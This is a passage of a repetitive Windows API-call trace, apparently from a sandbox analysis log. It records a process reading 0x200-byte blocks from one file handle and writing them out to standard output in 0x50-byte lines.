_get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.865] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] GetFileType (hFile=0x50) returned 0x1 [0136.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.865] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] GetFileType (hFile=0x50) returned 0x1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] GetFileType (hFile=0x50) returned 0x1 [0136.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.866] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.867] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.867] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.867] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] GetFileType (hFile=0x50) returned 0x1 [0136.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.868] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.869] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.869] GetFileType (hFile=0x50) returned 0x1 [0136.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.869] GetFileType (hFile=0x50) returned 0x1 [0136.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.869] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.870] GetFileType (hFile=0x50) returned 0x1 [0136.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.871] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.871] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.871] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.872] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] GetFileType (hFile=0x50) returned 0x1 [0136.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.872] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.873] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.873] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] GetFileType (hFile=0x50) returned 0x1 [0136.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.873] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.874] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.874] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] GetFileType (hFile=0x50) returned 0x1 [0136.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.874] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] GetFileType (hFile=0x50) returned 0x1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.875] 